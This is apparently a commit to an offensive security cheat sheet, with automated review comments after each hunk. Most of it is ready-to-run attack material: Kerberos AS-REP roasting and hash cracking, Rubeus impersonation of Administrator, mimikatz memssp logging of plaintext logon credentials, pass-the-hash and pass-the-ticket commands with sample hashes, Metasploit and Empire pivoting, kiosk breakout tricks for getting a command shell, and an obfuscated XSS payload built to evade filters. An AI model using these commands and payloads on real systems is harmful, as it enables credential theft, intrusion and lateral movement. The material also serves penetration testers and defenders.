Application Escape and Breakout

This commit is contained in:
Swissky 2020-12-17 08:56:58 +01:00
parent 973f091d1b
commit f7e8f515a5
6 changed files with 171 additions and 10 deletions

View file

@ -1126,7 +1126,7 @@ Mitigations:
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
Prerequisite: Prerequisite:
- Accounts have to have **DONT_REQ_PREAUTH** - Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
```powershell ```powershell
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
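Review bot: the context line `git clone https://github.com/GhostPack/Rubeus#asreproast` will not work as written; git does not accept a `#fragment` on a clone URL, and `#asreproast` is only the README anchor for that section. Suggest `git clone https://github.com/GhostPack/Rubeus` with a comment pointing at the asreproast section of the README. The added `Get-DomainUser -PreauthNotRequired` query is also exactly what an administrator can run to audit which accounts still carry DONT_REQ_PREAUTH, so it deserves a mention under the Mitigations heading as the detection side of this prerequisite.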
@ -1178,6 +1178,7 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
# crack AS_REP messages # crack AS_REP messages
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
``` ```
Mitigations: Mitigations:
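Review bot: the added Windows line wraps the placeholder in single quotes, `'<AS_REP-hash>'`, but cmd.exe does not treat single quotes as quoting characters, so they are passed to hashcat as part of the argument; use double quotes, or read the hash from a file as the Linux line above does. `hashcat64.exe` is also the binary name of older releases only; current builds ship `hashcat.exe`. Consider dropping `--force` from the Linux line as well, since it merely suppresses driver warnings and is not needed for mode 18200.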
@ -1806,9 +1807,9 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
5. Use Rubeus to get hash from password 5. Use Rubeus to get hash from password
```powershell ```powershell
Rubeus.exe hash /password:'Weakest123*' /user:swktest /domain:factory.lan Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan
[*] Input password : Weakest123* [*] Input password : Weakest123*
[*] Input username : swktest [*] Input username : swktest$
[*] Input domain : factory.lan [*] Input domain : factory.lan
[*] Salt : FACTORY.LANswktest [*] Salt : FACTORY.LANswktest
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
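Review bot: the username was changed to the machine account `swktest$` but the output below it was not regenerated: the `[*] Salt : FACTORY.LANswktest` line is the salt for a user account, whereas for a `$` account Rubeus derives the AES salt from the host form of the name (realm, the literal `host`, the lower-case hostname and the lower-case realm). The `rc4_hmac` value is salt-independent and stays correct, but any aes128/aes256 keys printed further down would differ from what a reader gets by running the command, so the output should be captured again with the `$` username.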
@ -1821,6 +1822,7 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
```powershell ```powershell
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
.\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
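Review bot: the new `/aes256:` invocation needs a one-line comment explaining why it exists next to the `/rc4:` line, otherwise the reader sees two near-identical commands. The distinction is relevant to defenders: with `/rc4:` the resulting service ticket requests are RC4-encrypted (etype 0x17), which stands out in event 4769 for an account that supports AES, while the AES256 form matches the domain's normal encryption type. Also check that the aes256 key used here is shown in the `Rubeus.exe hash` output of the previous hunk, whose visible part stops at `rc4_hmac`.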

View file

@ -0,0 +1,111 @@
# Application Escape and Breakout
## Summary
* [Gaining a command shell](#gaining-a-command-shell)
* [Sticky Keys](#explorer---sticky-keys)
* [Dialog Boxes](#dialog-boxes)
* [Creating new files](#creating-new-files)
* [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance)
* [Exploring Context Menus](#exploring-context-menus)
* [Save as](#save-as)
* [Input Boxes](#input-boxes)
* [Bypass file restrictions](#bypass-file-restrictions)
* [Internet Explorer](#internet-explorer)
* [Shell URI Handlers](#shell-uri-handlers)
* [References](#references)
## Gaining a command shell
* **Shortcut**
* [Window] + [R] -> cmd
* [CTRL] + [ALT] + [SHIFT] -> Task Manager
* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it
* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
* **Task Manager**: `File` > `New Task (Run...)`
* **MSPAINT.exe**
* Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
* Zoom in to make the following tasks easier
* Using the colour picker, set pixels values to (from left to right):
* 1st: R: 10, G: 0, B: 0
* 2nd: R: 13, G: 10, B: 13
* 3rd: R: 100, G: 109, B: 99
* 4th: R: 120, G: 101, B: 46
* 5th: R: 0, G: 0, B: 101
* 6th: R: 0, G: 0, B: 0
* Save it as 24-bit Bitmap (*.bmp;*.dib)
* Change its extension from bmp to bat and run
## Sticky Keys
* Spawn the sticky keys dialog
* Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}`
* Hit 5 times [SHIFT]
* Visit "Ease of Access Center"
* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center"
* Start the OSK (On-Screen-Keyboard)
* You can now use the keyboard shortcut (CTRL+N)
## Dialog Boxes
### Creating new files
* Batch files Right click > New > Text File > rename to .BAT (or .CMD) > edit > open
* Shortcuts Right click > New > Shortcut > `%WINDIR%\system32`
## Open a new Windows Explorer instance
* Right click any folder > select `Open in new window`
## Exploring Context Menus
* Right click any file/folder and explore context menus
* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location`
### Save as
* "Save as" / "Open as" option
* "Print" feature selecting "print to file" option (XPS/PDF/etc)
* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe`
### Input Boxes
Many input boxes accept file paths; try all inputs with UNC paths such as `//attackerpc/` or `//127.0.0.1/c$` or `C:\`
### Bypass file restrictions
Enter *.* or *.exe or similar in `File name` box
## Internet Explorer
### Download and Run/Open
* Text files -> opened by Notepad
### Menus
* The address bar
* Search menus
* Help menus
* Print menus
* All other menus that provide dialog boxes
## Shell URI Handlers
* shell:DocumentsLibrary
* shell:Librariesshell:UserProfiles
* shell:Personal
* shell:SearchHomeFolder
* shell:System shell:NetworkPlacesFolder
* shell:SendTo
* shell:Common Administrative Tools
* shell:MyComputerFolder
* shell:InternetFolder
## References
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
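Review bot: several items in the new file are inconsistent with each other. The summary entry `[Sticky Keys](#explorer---sticky-keys)` points at an anchor that does not exist; the heading is `## Sticky Keys`, so the link should be `#sticky-keys`. In the Shell URI Handlers list, `shell:Librariesshell:UserProfiles` and `shell:System shell:NetworkPlacesFolder` are two handlers each fused into one bullet and should be split into `shell:Libraries`, `shell:UserProfiles`, `shell:System` and `shell:NetworkPlacesFolder`. Under Gaining a command shell, `[CTRL] + [ALT] + [SHIFT] -> Task Manager` is not the Task Manager shortcut; it is `[CTRL] + [SHIFT] + [ESC]`, and `[Window] + [R]` should read `[Windows] + [R]`. Finally, `### Save as`, `### Input Boxes` and `### Bypass file restrictions` are level-3 headings but appear at the top level in the summary, so either the heading levels or the summary indentation should be adjusted.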

View file

@ -138,7 +138,12 @@ or
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 # Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24 run autoroute -s 192.168.15.0/24
use auxiliary/server/socks4a use auxiliary/server/socks_proxy
set SRVPORT 9090
set VERSION 4a
# or
use auxiliary/server/socks4a # (deprecated)
# Meterpreter list all active routes # Meterpreter list all active routes
run autoroute -p run autoroute -p
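Review bot: after `set SRVPORT 9090` and `set VERSION 4a` the module is never started; add `run -j` so the proxy actually listens in the background before anything is pointed at port 9090. Since `auxiliary/server/socks4a` is marked deprecated, it would be clearer to keep it only as a comment rather than a second `use` line that a reader may paste verbatim after the first.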
@ -152,6 +157,15 @@ route delete 192.168.14.0 255.255.255.0 3
route flush route flush
``` ```
## Empire
```powershell
(Empire) > socksproxyserver
(Empire) > use module management/invoke_socksproxy
(Empire) > set remoteHost 10.10.10.10
(Empire) > run
```
## sshuttle ## sshuttle
Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
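Review bot: the Empire block mixes commands from two contexts without saying so: `socksproxyserver` appears to be issued at the Empire server prompt, while `use module management/invoke_socksproxy`, `set remoteHost` and `run` are issued from within an agent, and `10.10.10.10` should be labelled as the Empire host that runs the SOCKS server. A leading comment per context would fix that. The block is also fenced as `powershell` for what is Empire console input, and a blank line before `## Empire` would keep it consistent with the `## sshuttle` heading below.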

View file

@ -79,13 +79,13 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::logonpasswords
``` ```
- LSA is running as virtualized process (LSAISO) by Credential Guard - LSA is running as virtualized process (LSAISO) by **Credential Guard**
```powershell ```powershell
# Check if a process called lsaiso.exe exists on the running processes # Check if a process called lsaiso.exe exists on the running processes
tasklist |findstr lsaiso tasklist |findstr lsaiso
# If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data. # Lets inject our own malicious Security Support Provider into memory
#Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides # require mimilib.dll in the same folder
mimikatz # misc::memssp mimikatz # misc::memssp
# Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log # Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
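Review bot: the removed sentence explained why the page moves from dumping LSASS to `misc::memssp` (with Credential Guard only encrypted data can be read from LSASS), and the replacement comment drops that reasoning; keep a short version of it, minus the `tou` typo. Also verify the new `# require mimilib.dll in the same folder` comment: `memssp` is normally chosen precisely because it patches LSASS in memory without dropping a DLL, while `mimilib.dll` is what the registry-registered SSP method needs, so the two may have been conflated. From a detection standpoint the context line already gives the key artifact, the creation of `c:\windows\system32\mimilsa.log`, which is worth calling out explicitly as something to monitor.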

View file

@ -7,8 +7,8 @@
* [TIP 2 - Retail Credential](#tip-2-retail-credential) * [TIP 2 - Retail Credential](#tip-2-retail-credential)
* [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount) * [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
* [Metasploit](#metasploit) * [Metasploit](#metasploit)
* [Metasploit - SMB](#metasploit-smb) * [Metasploit - SMB](#metasploit---smb)
* [Metasploit - Psexec](#metasploit-psexec) * [Metasploit - Psexec](#metasploit---psexec)
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
* [WinRM](#winrm) * [WinRM](#winrm)
* [Powershell Remoting](#powershell-remoting) * [Powershell Remoting](#powershell-remoting)
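Review bot: the hunk fixes the `#metasploit---smb` and `#metasploit---psexec` anchors but leaves `#tip-3-sandbox-credrential-wdagutilityaccount` untouched; if the heading itself is spelled "Credential", that link is broken in the same way and should be corrected to `#tip-3-sandbox-credential-wdagutilityaccount` in this change.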
@ -20,6 +20,8 @@
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Netuse](#netuse) * [Netuse](#netuse)
* [Runas](#runas) * [Runas](#runas)
* [Pass the Ticket](#pass-the-ticket)
* [SSH](#ssh)
## TIPS ## TIPS
@ -87,6 +89,7 @@ use exploit/windows/smb/psexec
set RHOST 10.2.0.3 set RHOST 10.2.0.3
set SMBUser username set SMBUser username
set SMBPass password set SMBPass password
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
set PAYLOAD windows/meterpreter/bind_tcp set PAYLOAD windows/meterpreter/bind_tcp
run run
shell shell
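Review bot: the added `set SMBPass e52cac67...:8846f7ea...` directly follows `set SMBPass password`, so the second line silently overwrites the first and a reader cannot tell they are alternatives; precede the hash line with a comment such as `# or pass-the-hash with LM:NT` and note that psexec accepts the hash in the same option as the password. The NT half shown, `8846f7eaee8fb117ad06bdd830b7586c`, is the NT hash of the string "password", which nicely matches the line above and could be said in the comment so the example is obviously a demo value.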
@ -123,6 +126,7 @@ Require:
root@payload$ git clone https://github.com/Hackplayers/evil-winrm root@payload$ git clone https://github.com/Hackplayers/evil-winrm
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
``` ```
or using a custom ruby code to interact with the WinRM service. or using a custom ruby code to interact with the WinRM service.
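Review bot: the three invocations in this block now use three different forms (`evil-winrm`, `evil-winrm.rb`, `ruby evil-winrm.rb`); pick one so the reader does not wonder whether they are different tools. The new `-H` line also deserves a comment stating that the option takes the NT hash only, without an LM prefix, and that this is NTLM over WinRM (logon type 3 in event 4624 with the NTLM package on the target), since the rest of the section uses a plaintext password.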
@ -190,7 +194,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
## Psexec.py / Smbexec.py / Wmiexec.py ## Psexec.py / Smbexec.py / Wmiexec.py
from Impacket From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
```powershell ```powershell
root@payload$ git clone https://github.com/CoreSecurity/impacket.git root@payload$ git clone https://github.com/CoreSecurity/impacket.git
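Review bot: the new sentence links Impacket at `github.com/SecureAuthCorp/impacket`, but the `git clone` line just below still uses `github.com/CoreSecurity/impacket.git`; make the two agree. The `impacket-xxx` placeholder should also be a concrete example of the Kali naming, e.g. `impacket-wmiexec`, so the reader knows what to look for.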
@ -204,6 +208,8 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10
# A semi-interactive shell, used through Windows Management Instrumentation. # A semi-interactive shell, used through Windows Management Instrumentation.
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10 root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. # A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10 root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
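Review bot: the added `wmiexec.py domain.local/user@10.0.0.20 -hashes ...` line should carry a comment that the value is `LM:NT` and that the LM half `aad3b435b51404eeaad3b435b51404ee` is the empty-LM constant, which impacket also accepts omitted as `-hashes :NT`. The invocation style (`wmiexec.py` versus `python wmiexec.py` on the line above) should match as well.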
@ -289,6 +295,24 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
``` ```
## Pass the Ticket
```powershell
python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local/user
[*] Saving ticket in user.ccache
cp user.ccache /tmp/krb5cc_0
export KRB5CCNAME=/tmp/krb5cc_0
klist
```
## SSH
:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!
```ps1
cp user.ccache /tmp/krb5cc_1045
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
```
## References ## References
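Review bot: the NT hash in the Pass the Ticket example, `B65039D1C0359FA797F88FF06296118F`, differs from the one used for the same `user` elsewhere in this change (`BD1C6503987F8FF006296118F359FA79`); use one value consistently. The `cp user.ccache /tmp/krb5cc_0` step is unnecessary, since `export KRB5CCNAME=user.ccache` works on the file where `getTGT.py` saved it, and copying the cache to `krb5cc_0` (the default cache of uid 0) risks clobbering a real one. In the SSH section the fence is tagged `ps1` but the commands are bash, the warning sentence is missing its closing parenthesis after "passing the hash!", and it would help to say that `GSSAPIAuthentication=yes` only succeeds when the target sshd accepts GSSAPI and has a host principal, which is also why `-vv` is useful there.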

View file

@ -49,6 +49,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass ";" using another character](#bypass-using------using-another-character)
- [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katana](#bypass-using-katana) - [Bypass using Katana](#bypass-using-katana)
- [Bypass using Cuneiform](#bypass-using-cuneiform)
- [Bypass using Lontara](#bypass-using-lontara) - [Bypass using Lontara](#bypass-using-lontara)
- [Bypass using ECMAScript6](#bypass-using-ecmascript6) - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
- [Bypass using Octal encoding](#bypass-using-octal-encoding) - [Bypass using Octal encoding](#bypass-using-octal-encoding)
@ -834,6 +835,15 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
``` ```
### Bypass using Cuneiform
```javascript
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
```
### Bypass using Lontara ### Bypass using Lontara
```javascript ```javascript
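Review bot: unlike the Katakana entry above, the Cuneiform block has no introductory line saying what it evaluates to or where it comes from. Reading the visible lines, `𒉺` is `"true"`, `𒀃` is `"false"`, `𒇺` is `"[object Object]"`, `𒁹` is built up to `"constructor"`, and the final call is `"true"["constructor"]["constructor"]("alert(𒀀)")()`, i.e. `alert(1)` via the Function constructor, with `𒀀` left at 1 by the earlier `𒀀++`. A one-line note to that effect would make the entry as self-explanatory as its neighbours and helps defenders understand why keyword-based filters do not match it: the only ASCII in the payload is punctuation, the string `"(𒀀)"` and the Function-constructor lookup, so detection has to key on behaviour rather than on identifiers. Also note it relies on undeclared global assignments, so it does not run under strict mode or inside an ES module, and it lacks the `javascript:` prefix that the Katakana line has, so the two are not used the same way.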